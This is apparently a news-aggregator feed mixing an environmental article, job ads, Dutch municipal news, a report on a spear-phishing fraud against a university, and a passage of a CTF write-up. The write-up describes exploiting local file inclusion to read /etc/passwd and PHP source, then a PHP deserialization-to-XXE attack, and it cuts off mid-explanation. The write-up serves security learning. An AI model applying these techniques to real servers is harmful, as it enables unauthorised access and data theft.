    Gillian Anderson has backed calls for the creation of the largest protected area on Earth in the Antarctic Ocean. The X Files and The Fall star joined Greenpeace to hand in a petition to the UK Government signed by more than 350,000 people urging protection of a vast area of Antarctic waters. Greenpeace is calling for a 1.8 million square kilometer ocean sanctuary, which would be a safe haven to wildlife including penguins, whales and seals, to be created at a meeting of governments in Tasmania later this month. They were joined to hand in the petition at the Foreign and Commonwealth Office in London by one of the penguin sculptures which have been spotted “marching” for protection in cities around the world. The petition backing a sanctuary in the Weddell Sea, to protect its wildlife and habitats from damaging activities such as large-scale fishing, has been signed by two million people worldwide. Anderson, a Greenpeace Antarctic ambassador, said: “Sadly we have been all too quick to exploit our global oceans, and all too slow to protect them. “Despite scientists agreeing we urgently need massive ocean sanctuaries to protect marine life, progress is glacially slow. “That’s why I support Greenpeace’s campaign to create a huge Antarctic Ocean sanctuary.” Louisa Casson, of Greenpeace’s Protect the Antarctic campaign, said: “It’s easy to feel remote from the other side of the planet, but what happens in the Antarctic affects us all. “This month, governments have the opportunity to create the largest protected area on Earth – an Antarctic Ocean sanctuary – which would be a safe haven for penguins, whales and seals, put the area off-limits to industrial fishing and help to tackle climate change. In two weeks, governments will meet to decide whether to create a vast Antarctic Ocean Sanctuary! 🐧 Now’s the time to make a difference >> https://t.co/AgbtwzSk1D pic.twitter.com/bZB3BIyWh3 — Greenpeace (@Greenpeace) October 9, 2018 “The Antarctic doesn’t have a voice, but we are a global movement of over two million people and we do,” she said. Ms Casson welcomed the Government’s support for ocean protection and said 350,000 people were calling on UK officials to do everything they could to protect Antarctic waters at the meeting this month. Alan Duncan, Foreign Office minister for the polar regions, said: “The UK has been unwavering in our commitment to establish marine protected areas in Antarctica and we are using our voice internationally to make the case for practical action.”

    The post Gillian Anderson backs calls for ‘huge’ Antarctic wildlife sanctuary appeared first on London Glossy Post.


              Part-Time Professor - Network Systems and Components - Durham College - Oshawa, ON      Cache   Translate Page      
    This is a necessary foundation for further investigations and the testing of remedial actions covered in in the Access Controls, Hacking &amp; Exploits and Network...
    From Durham College - Wed, 26 Sep 2018 07:27:59 GMT - View all Oshawa, ON jobs
              Study of migrant sex workers      Cache   Translate Page      
    Press Release – University of Otago Wednesday, 10 October 2018 University of Otago, Christchurch releases first study of migrant sex workers The majority of migrant sex workers in New Zealand who participated in new University of Otago research, are in safe employment situations and working to fund study or travel rather than being desperate, exploited […]
              GRC-Divers postes administratifs - CR-04, CR-05, AS-01 - Répertoire occasionnel - Gouvernement du Canada - Saskatchewan      Cache   Translate Page      
    Expérience de l’exploitation d’un système de gestion de l’information en ressources humaines tel que PeopleSoft. Gendarmerie royale du Canada.... $47,729 - $51,518 a year
    From Government of Canada - Sun, 07 Oct 2018 05:05:04 GMT - View all Saskatchewan jobs
              Brève : Méthanor : un bénéfice semestriel en hausse      Cache   Translate Page      
    Société spécialisée dans le financement et l'exploitation d'unités de méthanisation en milieu agricole et les énergies renouvelables, Méthanor a réalisé au cours du 1er semestre 2018 un résultat net de +172,5 Keuros, en hausse de +37% par rapport au 1er...
              Capturing the HackerOne Flag      Cache   Translate Page      

    by Daniel Abeles & Shay Shavit

    HackerOne is a bug bounty platform that allows hackers around the world to participate in bug bounty campaigns, initiated by HackerOne's customers. Recently, HackerOne announced they would be hosting a special live hacking event in Buenos Aires along side a week long security conference, Ekoparty 14 .

    In order to participate the special event, you either have to be a top ranked hacker on their platform, or solve a challenge. Although we don't intend to fly from Israel to Argentina, challenges, especially capture the flag (CTF) challenges, really excited us.

    We heard about the CTF from HackerOne's tweet, and immediately set our sights on the prize. The CTF started from the tweet itself, which contained an image with a QR code:


    Capturing the HackerOne Flag

    The QR code represented the following string:


    Capturing the HackerOne Flag

    The characters looked familiar, and we immediately suspected they were URL encoded bytes, so we added a '%' to every second character:

    %68%74%74%70%73%3a%2f%2f%68%31%2d%35%34%31%31%2e%68%31%63%74%66%2e%63%6f%6d

    We decoded the string using Burp Suite's decoder to reveal the URL ( https://h1-5411.h1ctf.com ):

    From there, we started exploring the website:


    Capturing the HackerOne Flag

    The website was a meme generation service. In order to test its capability, we picked a template from a closed set of images and created our own meme. The capability was presented at the following page:


    Capturing the HackerOne Flag
    The page allows users to choose between text and image types of memes; after inserting the top and bottom text,we hit the GENERATE button, and the image/text was shown at the bottom.
    Capturing the HackerOne Flag

    Once a meme is generated, it was added to a list of memes stored in the session. All the memes, are reflected at the "memes.php" page.

    We took a closer look at the generation request and noticed that the response contained JSON string with the local meme path on the remote server (we couldn't control the "meme_path" value, since it was auto-generated by the server).


    Capturing the HackerOne Flag
    Capturing the HackerOne Flag

    We tried to manipulate some fields with no success. We thought the "template" field might be vulnerable to Local File Inclusion since its URL indicated it was a file. Instead of supplying a template, we tried to pull the "/etc/passwd" file. Success!


    Capturing the HackerOne Flag
    Capturing the HackerOne Flag

    After we validated the vulnerability, we had the ability to reflect local files from the server to the memes page. Using this vulnerability, our next step was to pull the website's source code. We started by pulling the "index.php" file:


    Capturing the HackerOne Flag
    Capturing the HackerOne Flag

    Once we have succeeded in pulling the "index.php" we iteratively pulled every php file referenced in the source code, resulting in an almost full dump of the of the site. Some code was not pulled with this method, since it was not referenced in other pages:


    Capturing the HackerOne Flag

    We examined the source code, and the "headers.php" file caught our attention. It had 2 lines commented out - the import and export memes php files -- which looked like they belonged to the 2.0 version of the site:


    Capturing the HackerOne Flag

    These pages were still available on the website:


    Capturing the HackerOne Flag
    Capturing the HackerOne Flag

    We inspected the "export" functionality. A brief examination of the export function showed the ability to download your entire meme collection in a "memepak" format. We opened the file, which contained base64 encoded data from a PHP serialized array:


    Capturing the HackerOne Flag
    This immediately gave us a hint that we might be facing a deserialization vulnerability. One method of exchanging data between a client and server is object serialization. When the client requests a programmatic resource, the server can turn that resource into a string (serialization) and hand it over to the client. The process works also works in the opposite direction, creating an object from a string is called "deserialization".

    In PHP, in order to unserialize an object, the PHP interpreter must be familiar with the class information - this meant we can only serialize primitives (like integers) or defined classes (arrays, custom classes).

    Besides being familiar with the classes, needed to meet a two objectives to complete a successful deserialization attack:

    Have some sort of control on data that was input to the class

    A sink function (magic function) that could reference the input data and be triggered natively by the system (like "__toString", "__constuct", etc).

    On the "classes.php" file we extracted before, we found 3 defined classes:

    Template

    Maintenance

    ConfigFile

    The Maintenance class was commented out, with a comment stating it belonged to an internal service, which made it a dead end.

    The ConfigFile was the most interesting class, since it contains the "__toString" magic function. "_toString" executed the parse function, loading an external XML file which could lead to an XML External Entity processing vulnerability (XXE).

    In the process of parsing the XML, the parser goes through the input and reaches an external entity. It then tries to retrieve the content of the entity. This can expose the application to various risks, such as information disclosure, server side request forgery, inner network port scanning amongst other vulnerabilities.


    Capturing the HackerOne Flag

    Since the "ConfigFile" class seemed like a good entry point, we chose it as our desired class to serialize. To exploit the deserialization vulnerability, we were required finding where the serialization method was invoked. The code showed the content was serialized is the memes array stored in the session:


    Capturing the HackerOne Flag
    The deserialization phase occurs on the import function, when uploading a new "memepak" file. The function first validated the we had uploaded a file, then read its content, base64 decoded it, and sent it to the
              Lib-Nat government defies IPCC climate warning to back coal      Cache   Translate Page      
    Australia’s conservative Liberal-National government has rejected the Intergovernmental Panel on Climate Change (IPCC) report’s call to phase out coal power by 2050, claiming renewable energy cannot replace base-load coal power. The National Party deputy prime minister, Michael McCormack, said Australia should “absolutely” continue to use and exploit its coal reserves, despite the IPCC’s dire warnings […]
              New Arctic Ocean fishing to be banned under new global deal      Cache   Translate Page      
    Commercial fishing in parts of the Arctic Ocean opened up by melting ice caps will be banned under a new deal to protect ecosystems. Nine countries and the European Union will this week sign the agreement to prevent exploitation of a region covering 2.8 million square kilometres, roughly the size of the Mediterranean Sea, for 16 […]
              Almere - Floriadewijk kost meer en heeft minder sociale woningbouw      Cache   Translate Page      

    De Floriade woonwijk krijgt geen 30% sociale woningbouw, maar 20%. Dat staat in het definitief ontwikkelingsplan van Amvest. De projectontwikkelaar zegt wel meer sociale woningen te kunnen bouwen maar dan kost dat de gemeente Almere 4,2 miljoen euro. Het college van burgemeester en wethouders stelt dat te veel geld te vinden voor de bouw van 60 sociale woningen en gaat akkoord met 20%. Ook maakt de gemeente geen miljoen winst met het ontwikkelingsplan van Amvest zoals de raad wilde, maar een miljoenenverlies van 7,6 miljoen euro. 

    De gemeenteraad buigt zich waarschijnlijk na de herfstvakantie over het Floriade-dossier op de politieke markt. De raad kan tot 1 december op- en aanmerkingen maken op het ontwikkelingsplan. Daarna besluit het college of de opdracht definitief aan Amvest wordt gegund. Hoogleraar Gebiedsontwikkeling Arjan Bregman van de Universiteit van Amsterdam maakte zich al eerder zorgen over deze werkwijze, maar volgens toenmalig wethouder Mark Pol was dat onterecht en kan de gemeenteraad nog van de deal afzien.    

    [Quote:college van B & W:"Het verlies van 7,6 miljoen is een investering in de toekomst"]

    Voor de ontwikkeling van de woonwijk schreef de gemeenteraad op 1 december vorig jaar een Europese aanbesteding uit. Hieraan deden naast Amvest ook Dura Vermeer en BPD mee, maar de inschrijvingen van die twee partijen werden ongeldig verklaard waardoor Amvest overbleef.

    Wat waren de eisen en wensen van de gemeenteraad?
    De gemeenteraad gaf het college bij het kiezen van een marktpartij een aantal kaders mee. Een eis betrof de verkoop van de grond voor 600 woningen en 60 waterwoningen. De deal met Amvest moest Almere onder aan de streep een miljoen euro opleveren. Ook moesten er extra geluidswerende maatregelen worden genomen. 

    Een belangrijke wens betrof verder de bouw van woningen voor mensen met een smalle beurs: 20% sociale huur en 10% sociale koop.

    Ook wilde de raad dat de wijk zeer autoluw zou worden met hooguit duizend parkeerplaatsen, zoveel mogelijk aan de randen van de wijken. Parkeergarages liggen op maximaal 150 meter van de huizen en bewoners maken gebruik van elektrische deelauto's. 

    [Image:https://d103xssldlwvo3.cloudfront.net/image/vidcaster/pictures/181009_Impressies_Floriade_1_91AB9C4955F90031C125832100468FF7.jpg]
     

    Meer woningbouw toestaan, kan miljoenenverlies wegwerken
    Uit het plan van Amvest blijkt dat de gemeente geen winst maakt op de verkoop van de grond maar een miljoenenverlies. De grondexploitatie van de wijk levert een tekort op van 7,6 miljoen euro. De kosten bedragen circa 61 miljoen. De gemeente investeert met name in het gebied door het aanplanten van de bomen- en plantenbibliotheek, het arboretum en de aanleg van verkeersbruggen. De opbrengst door de grond te verkopen aan Amvest bedraagt circa 53.400.000 euro. 

    Volgens het college van burgemeester en wethouders kan het verlies grotendeels worden betaald uit de reserves van de gemeente: 7,2 miljoen. Verder zou de nieuwe businesscase van de Floriade circa 4 ton opleveren en met het verlies kunnen worden verrekend. Hierover praat de gemeenteraad binnenkort op de politieke markt verder bij de behandeling van de begroting voor volgend jaar.

    Het college van burgemeester en wethouders ziet het verlies van 7,6 miljoen meer als een investering in de toekomst. De investeringen in het gebied die horen bij een woonwijk met meer woningen, zijn dan namelijk al gedaan. Een andere discussie die de gemeenteraad dan ook zal gaan voeren, betreft het toestaan van het bouwen van extra woningen in de wijk. Nu heeft de gemeente in het nieuwe bestemmingsplan bepaald dat dit 600 woningen en 60 waterwoningen betreft. Maar adviesbureau Andersson Elffers Felix (AEF) geeft in een rapportage aan dat er nog zeker duizend woningen bij zouden kunnen komen, goed voor een extra opbrengst van 35/40 miljoen euro. Dan zou het verlies van 7,6 miljoen euro ruimschoots worden gecompenseerd.

    Tegenover het verlies staat bovendien dat Amvest voor eigen rekening en risico de grond bouw- en woonrijp maakt, de infrastructuur aanlegt en het gebied ontwikkelt. De projectontwikkelaar zal voor circa 300 miljoen in het gebied investeren, zo staat in de stukken. Ook wil Amvest zich langdurig aan het gebied verbinden.

    [Image:https://d103xssldlwvo3.cloudfront.net/image/vidcaster/pictures/181009_Impressies_Floriade_2_F341C9E1A85C4CC6C125832100468FFE.jpg]
     

    Hoeveel overheidsgeld zit er al in de Floriade?
    Het is niet de eerste keer dat er extra geld wordt gevraagd voor het Floriade-project. De gemeenteraad stak vorig jaar al zo'n 4,4 miljoen euro extra in de organisatie van de Floriade. Dat geld kwam bovenop de 10 miljoen euro die er oorspronkelijk voor was uitgetrokken. Beide keren werd er door toenmalige verantwoordelijk wethouders beloofd dat het hierbij zou blijven. Ook de huidig wethouder Loes Ypma zegt nu dat ze niet verwacht dat ze de raad nog een keer om extra geld moet vragen.

    Naast het verlies op de grondexploitatie steekt Almere in totaal bijna 14,4 miljoen euro in de businesscase Floriade. Daarnaast trekt de gemeente ook nog 3,4 miljoen euro uit in de begroting voor de realisatie van stil asfalt ten behoeve van de Floriade woonwijk. De provincie betaalt 10 miljoen euro. Verder hoopt de gemeente dat de Rijksoverheid er minimaal 5 miljoen euro bijlegt, maar dat bedrag is nog altijd niet zeker. Daarnaast wordt er nog gerekend op wat kleinere bijdragen van andere overheden zoals de gemeente Amsterdam.

    Floriade-wijk is al grotendeels gereed tijdens het evenement
    De gebiedsontwikkeling en het evenement worden met de komst van Amvest nog meer met elkaar geïntegreerd. De investeringen in het gebied zijn zowel voor het evenemententerrein als de nieuwe woonwijk. Ook wordt een groot deel van de woningen en voorzieningen al tijdens het evenement Floriade neergezet: 428 woningen en paviljoens. Die moeten er medio 2021 staan, wil het evenement op 29 april 2022 van start kunnen gaan. Een deel van het vastgoed wordt na de wereldtuinbouwtentoonstelling omgebouwd tot huizen. De wijk wordt na afloop van het zes maanden durende evenement verder afgebouwd. Dat duurt tot ongeveer 2024.

    Minder sociale huurwoningen en meer vrije sector huurwoningen
    Het woningbouwprogramma van de toekomstige wijk komt er wel anders uit te zien. De gemeenteraad had eerder de wens neergelegd dat van de 600 huizen 30% sociale woningbouw zou zijn, 15% vrije sector huurwoningen, 25% middeldure koopwoningen en 30% dure koopwoningen met 30 kavels. Maar in het plan van Amvest komen er vooral minder sociale huurwoningen en meer vrije sector huurwoningen: 

    - 20% sociale woningbouw (120 appartementen verdeeld over vier flats)
    - 40% vrije sector huurwoningen (180 woningen en 120 appartementen van 100-140 m2)
    - 10% middeldure koopwoningen (60 woningen van 120 m2)
    - 30% dure koopwoningen, waaronder 30 kavels (55 woningen en 95 appartementen van 120-200 m2 en 30 kavels)
    - 60 dure waterwoningen
    - 42.000 vierkante meter aan voorzieningen (hotel met 180 kamers, horeca, markthal, kinderopvang, bedrijfsgebouwen). Naast de ontwikkeling van voorzieningen door Amvest bouwt ook Aeres hogeschool een campus van 4000 vierkante meter op het terrein en zet de provincie er een innovatiepaviljoen neer van 1000 vierkante meter.

    Bomen- en plantenbibliotheek mogelijk botanische tuin
    Voor het beheer en onderhoud van het arboretum wordt nog nagedacht over het opzetten van een parkmanagementorganisatie, waarin zowel de gemeente als Amvest participeren. Voor het behoud van het Floriade-terrein wordt bekeken of het een monumentenstatus kan krijgen. Het zou dan het eerste gebied in Almere zijn waar het groen zo'n status krijgt. Verder wordt nog onderzocht of voor het beheer van de bomen- en plantenbibliotheek een officiële botanische tuin gemaakt kan worden. Het zou daarmee de eerste botanische tuin van Flevoland zijn.

    Winy Maas: "Te weinig gebouwen bedekt met planten"
    De gemeentelijke supervisor Winy Maas is redelijk positief over het ontwikkelingsplan. Architect en stedenbouwkundige Maas die het ontwerp maakte voor de Floriade, heeft ook zorgen. Hij is er nog niet van overtuigd dat er voldoende groene architectuur in het gebied aanwezig is. "Veel gebouwen zijn niet of onvoldoende bedekt met beplanting, en die gebouwen die wel groene balkons of gevels hebben lijken een beperkte relatie met het arboretum aan te gaan", zo schrijft hij in zijn advies. Hij meent dat er een beeldkwaliteitsplan moet komen.

    [Quote:Winy Maas, architect:"Veel gebouwen zijn niet of onvoldoende bedekt met beplanting."]

    Zorgen over te weinig inzendingen voor het vullen van de paviljoens
    Tot zover de ontwikkelingen van de Floriade-woonwijk. Extern adviesbureau Andersson Elffers Felix (AEF) heeft in opdracht van de gemeente nog eens goed gekeken naar de organisatie van het evenement Floriade, de zogeheten midterm review. Ligt de Floriade BV nog een beetje op koers? 

    Uit de rapportage valt op te maken dat er zorgen zijn over de organisatie van het evenement.

    - Er moeten concretere doelstellingen komen. De geformuleerde doelstellingen zijn nu erg divers, van een showcase voor de tuinbouwsector tot een leerproces voor de vergroening van steden. Hierdoor is het lastig sturing te geven aan het binnenhalen van inzendingen voor het evenement, evenals het binnenhalen van sponsors en subsidies.

    - De Floriade is in de kern een tentoonstelling waarop landen en steden zich presenteren. Voor de werving van internationale inzendingen is de BV afhankelijk van de inspanningen van anderen, zoals de Nederlandse ambassades in het buitenland. Het is de vraag of er snel genoeg zekerheid zal zijn over deze inzendingen. AEF denkt dat dit maar in beperkte mate zal gaan gebeuren gezien de krappe planning.

    - De gemeentelijke organisatie en de Floriade BV weten elkaar steeds moeilijker te vinden. Door de intensievere samenhang tussen het evenement en de woonwijk moet er juist beter met elkaar worden samengewerkt. De gemeenteraad denkt momenteel aan de hand van een advies van oud-minister Cees Veerman na over de opzet van een nieuwe structuur.

    - Er is bij de BV meer behoefte aan mensen met ervaring met het organiseren van grootschalige evenementen & festivals, de programmering daarvan, het werven van sponsoren en de lobby voor nationale en internationale inzendingen. Daar wordt in elk geval op gelet bij de werving van een nieuwe directeur, zo stelt het college in een reactie op het rapport. De huidige directeur Jan-Willem Griep is namelijk door ziekte langdurig uitgeschakeld en de andere directeur Jannewietske de Vries heeft een nieuwe baan gevonden. De projectdirecteur van de gemeentelijke organisatie Remko Schnieders neemt daardoor tijdelijk de taken van de BV waar. 

    [image:https://d103xssldlwvo3.cloudfront.net/image/vidcaster/pictures/181009_Impressies_Floriade_5_59CCE5E6C0D6862CC125832100468FEF.jpg]

     

    Kosten voor Floriade-evenement stijgen, gevolg is minder winst
    Nu de woonwijk en het evenement meer met elkaar worden verweven, is er ook een nieuwe doorrekening gemaakt van al deze uitgaven en opbrengsten. Dit komt omdat nu deels kosten en opbrengsten zijn onderbracht in de grondexploitatie waardoor de businesscase van de Floriade BV er nu anders uitziet. Zo worden vooral de investeringen voor het terrein overgeheveld naar de grondexploitatie.

    Verder zijn de kosten voor de organisatie van het evenement gestegen, doordat er 3,8 miljoen extra in de de projectorganisatie wordt gestoken. Dat sluit aan op het advies van AEF dat er een stevigere organisatie nodig is om van het evenement een succes te maken. Ook verwacht de BV zelf meer te moeten investeren in de aantrekkelijkheid van het programma van de Floriade en is er nu een kostenpost in de begroting opgenomen voor de beveiliging van het terrein.

    Het gevolg is dat het evenement naar verwachting niet meer 2 miljoen winst maakt, maar circa 250.000 euro.

    Vijf ton extra naar de risico-reservering
    De gemeente heeft verder de risico's die de organisatie van het evenement met zich meebrengen nader onder de loep genomen. Daarvoor wordt nu vijf ton extra gereserveerd. Het bedrag komt hiermee op een totaal van 11,5 miljoen euro. Dit bedrag werd eerder al eens verhoogd van 7 naar 11 miljoen euro. 

    Omdat Amvest de verdere ontwikkeling van het evenemententerrein en de stadswijk op zich neemt, vervalt een aantal risico's die hierop betrekking hebben. Aan de andere kant zijn er ook risico's bijgekomen. Zo zijn er zorgen over de inzendingen vanuit buitenlandse steden. Ook kunnen de Nederlandse inzendingen van een te laag niveau zijn. 

    Verder wil Amvest overnachtingen op het terrein tijdens het evenement aanbieden. Daarvoor is dan wel een goede avondprogrammering nodig. De kans bestaat dat er te weinig animo is voor een avondprogrammering. De gemaakte kosten zijn dan een nieuw risico.

    Overigens zijn ook nog niet alle kosten voor veiligheid inzichtelijk. Zo zou de avondprogrammering op dit gebied nog extra uitgaven met zich mee kunnen brengen.

    [StoryTelling:Media:27800B80E5724BA2C1258305005CF32F][StoryTelling:Media:26689215A2C0B222C1258321005C4206]
              Titre Associé aux Ventes Sans-Fil - Sept Iles - OSL Retail Services Inc - Sept-Îles, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Mon, 24 Sep 2018 13:21:37 GMT - View all Sept-Îles, QC jobs
              Titre Associé aux Ventes Sans-Fil - Alma - OSL Retail Services Inc - Alma, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Fri, 06 Jul 2018 01:21:59 GMT - View all Alma, QC jobs
              Titre Associé aux Ventes Sans-Fil - Val D'Or - OSL Retail Services Inc - Val-d'Or, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Thu, 20 Sep 2018 01:20:16 GMT - View all Val-d'Or, QC jobs
              Titre Gérant de Magasin Sans-Fil - OSL Retail Services Inc - Québec City, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Chez OSL, nous savons comment récompenser nos employés. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans...
    From OSL Retail Services Inc - Mon, 17 Sep 2018 19:20:40 GMT - View all Québec City, QC jobs
              Titre Associé aux Ventes Sans-Fil - Levis - OSL Retail Services Inc - Lévis, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Thu, 04 Oct 2018 19:19:16 GMT - View all Lévis, QC jobs
              Titre Associé aux Ventes Sans-Fil - Victoriaville - OSL Retail Services Inc - Victoriaville, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Wed, 03 Oct 2018 13:20:36 GMT - View all Victoriaville, QC jobs
              Titre Associé aux Ventes Sans-Fil - Ste-Agathe des Monts - OSL Retail Services Inc - Sainte-Agathe-des-Monts, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Wed, 22 Aug 2018 19:20:44 GMT - View all Sainte-Agathe-des-Monts, QC jobs
              Titre Gérant de Magasin Sans-Fil - Joliette - OSL Retail Services Inc - Joliette, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Chez OSL, nous savons comment récompenser nos employés. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans...
    From OSL Retail Services Inc - Fri, 21 Sep 2018 19:20:02 GMT - View all Joliette, QC jobs
              Titre Associé aux Ventes Sans-Fil - Joliette - OSL Retail Services Inc - Joliette, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Fri, 21 Sep 2018 19:19:46 GMT - View all Joliette, QC jobs
              Titre Associé aux Ventes Sans-Fil - Drummondville - OSL Retail Services Inc - Drummondville, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Thu, 12 Jul 2018 01:18:36 GMT - View all Drummondville, QC jobs
              How a fraudster got $12 million out of a Canadian university: They just asked for it      Cache   Translate Page      

    EDMONTON—The email started with an innocent “Hiya,” but the words that followed set off a chain of events that would tarnish a university’s reputation and send investigators on a months-long chase across the ocean and back.

    It’s been just over a year since MacEwan University was blindsided by an $11.8-million fraud. While the ruse itself was simple, the case that followed was anything but. Police had to navigate a complex money-laundering scheme that funneled some of the stolen public funds through various accounts in two continents before reinvesting it in a real-estate deal in Richmond, B.C.

    By scouring court documents from cities across the country that tracked investigations in Edmonton, Vancouver, the United Kingdom and Hong Kong, StarMetro has pieced together the most comprehensive picture of the case ever published and uncovered new details about how the money was stolen and where it went.

    It began in the summer of 2017, when MacEwan was in the midst of constructing the $180-million Allard Hall: a state-of-the-art building boasting music studios and dance halls with room for 1,800 students. Emails detailing transactions worth millions of dollars were pinging back and forth between school staff and vendors.

    As a result, one particular email, sent June 27, didn’t set off any alarms. Sent by a James Ellis of Clark Builders, a construction company working on the project, the email opened with the affable “Hiya” before asking the school’s accounts receivable department to reroute payments to a new National Bank of Canada account.

    A supporting letter attached to the email appeared to have been signed by Marc Timberman, the company’s chief financial officer.

    Read more:

    Edmonton’s MacEwan University recovers more than $10 million lost to phishing attack

    Alberta’s MacEwan University loses $11.8M after being fooled by email phishing scam

    Udeni Jayasinghe, an accounting technician with the university, changed the banking information on file. Exactly a month later, MacEwan wired $1.9 million into the new National Bank of Canada account.

    Oddly, the payment bounced back. The university’s bank confirmed the transfer didn’t go through because the account didn’t exist. Concerned, Jayasinghe replied to the email asking for updated banking co-ordinates.

    A response four days later provided new banking information, this time to an account with TD Bank. The email was accompanied by a revised letter that once again appeared to have been signed by Timberman.

    In just over a week, the university made three payments into the TD Bank account totalling more than $11.8 million.

    It would be almost two months before the university would learn the awful truth: Clark Builders never received these payments, no James Ellis had worked for the company for at least eight years and the real Timberman had no knowledge of the letters using his name.

    The email was a fraud. Over the course of a month, MacEwan University lost the equivalent of $622 for every part-time and full-time student enrolled. That’s enough to cover a year of tuition for more than 2,600 students pursuing bachelor’s degrees, or more than one-eighth of the total amount the university took in through tuition and fees during the 2016-2017 academic year.

    MacEwan had been fooled by what Const. William Lewadniuk, with the Red Deer RCMP financial crimes unit, called a “spear phishing scheme.”

    “It’s targeted to a specific individual,” said Lewadniuk. “Generally with a spear phishing scheme you would spoof the email address and try to get them to send you money, so you would pretend to be a contractor or a person’s boss.”

    The fraud was only discovered when Serge L’Abbe, senior project manager with Clark Builders, contacted the university on Aug. 23, 2017 to inquire about the missing money.

    The university immediately started investigating, according to a sworn statement filed in court in Montreal by Stuart McLean, associate vice-president of facilities with Grant MacEwan’s board of governors.

    They quickly discovered that while the email appeared to have been sent by “accounts.recievable@clarkbuilders.com” the email address had been “spoofed.” The display name of the email was different than the actual originating account.

    The university’s first break came on Aug. 25, 2017 when a Montreal Superior Court justice issued a seizure order and took back $6.3 million from the TD account, recovering more than half of the missing funds.

    The account had been opened under the name of Mono Shoes Inc., a company registered to a fifth-floor apartment near downtown Montreal. Before MacEwan’s millions of dollars poured in, according to documents filed in court, the account had a balance of less than $70.

    But this was just the beginning of the trail, not the end. In another plot twist, the man identified by a corporate registry search as president, sole director and shareholder of Mono Shoes — Jehad Albatniji — claimed he, too, had been a victim of fraud.

    In September, while he was in Jordan, Albatniji exchanged emails with one of MacEwan’s lawyers. He alleged a man in Montreal introduced him to another man in Toronto — the “main culprit,” Albatniji said, who had access to an account in Hong Kong.

    Here the story enters its second major theatre: East Asia. From the Mono Shoes TD account, investigators were able to track a trail of transactions to accounts based in Hong Kong.

    Lewadniuk — who has worked with the RCMP’s financial crimes unit in Red Deer for three years, with expertise in money laundering involving the proceeds of crime — said the money stolen in these types of schemes typically doesn’t stick around.

    “More and more, the money doesn’t stay in Canada,” he said. “They’ll try to get it sent out to a country outside of Canada because it is harder for us to recover the funds or follow up.”

    In cases like this, Lewadniuk said, finding out exactly who is responsible and building a case strong enough to lay criminal charges is rare.

    Criminals often create shell companies with corporate accounts, sometimes using stolen identities, to shuffle money around while concealing the identity of the people controlling the accounts.

    “They want to make it as hard as possible for people to be able to trace where the money goes, so you go from account to account to account through so many countries,” said Lewadniuk.

    Just one day after MacEwan wired $1.9 million to the Mono Shoes account, $1.4 million of the stolen funds was sent from the Mono Shoes account to an account supposedly operated by a company called Kinglong Commerce Development Ltd., based in Hong Kong.

    So began a series of transactions that would see the money moved from account to account before it was reinvested in a legitimate real-estate deal back on Canadian soil.

    Around the same time the fraud was unfolding in Edmonton, Vancouver-based company Hoi Fu Enterprises Ltd., owned by mother Jin Lan Feng and son John Yuan, was in the process of acquiring land in Richmond, B.C. The property at 4008 Stolberg St. was valued at over $25 million, but Hoi Fu Enterprises did not have the funds to purchase it outright.

    According to documents filed with the Supreme Court of British Columbia, the seller offered them a short-term mortgage to finance part of the purchase. The sale was completed on July 12, 2017, with Hoi Fu Enterprises Ltd. acquiring the property through a holding company.

    To pay back the mortgage, Hoi Fu Enterprises borrowed money from Yangjiang City Jixie Zhulu Engineering Ltd. in China. The registered legal representative and shareholder of that company is Yuan’s uncle.

    However, to lend Hoi Fu Enterprises the money, Yangjiang City Jixie Zhulu Engineering had to find a way to convert the funds from Chinese currency and send the money to Hoi Fu in Canada. This is how the stolen funds get involved.

    Yangjiang City Jixie Zhulu Engineering was then “introduced” to two individuals, Shao Xiong Ma and Shao Yun Ma, who claimed they could help purchase Canadian funds and move them from China to Canada, according to a statement filed on behalf of Hoi Fu Enterprises. Yangjiang City Jixie Zhulu Engineering agreed to lend the Mas the money in the form of Chinese renminbi on the condition that they repay their loan in Canadian dollars to Hoi Fu Enterprises in Canada.

    Between June and July of 2017, Yangjiang City Jixie Zhulu Engineering made four payments to the Mas totalling ¥6.7 million, which would have been worth approximately $1.2 million. In August, Hoi Fu Enterprises received three wire transfers totalling $1 million.

    What Hoi Fu Enterprises said it didn’t know was that the Mas had made a side deal with Kinglong Commerce Development. The Mas would make payments totalling ¥5.3 million — approximately $1 million — to four individuals and one company in China.

    In exchange, the Kinglong Commerce Development account, which had previously received $1.4 million in funds stolen during the MacEwan fraud, would transfer $1 million to Hoi Fu Enterprises.

    Kibben Jackson, a Vancouver-based lawyer who represented Hoi Fu Enterprises during MacEwan’s investigation and subsequent civil suits, said the owners contend they never knew the money they would eventually use to repay their mortgage on the property deal in Richmond was stolen from MacEwan University.

    Jackson said that after MacEwan threatened to seize $1 million from Hoi Fu Enterprises, the company settled the lawsuit in March 2018. He could not disclose how much money Hoi Fu Enterprises offered to MacEwan.

    While the case may have been complex, it was certainly not unique, according to experts in the field.

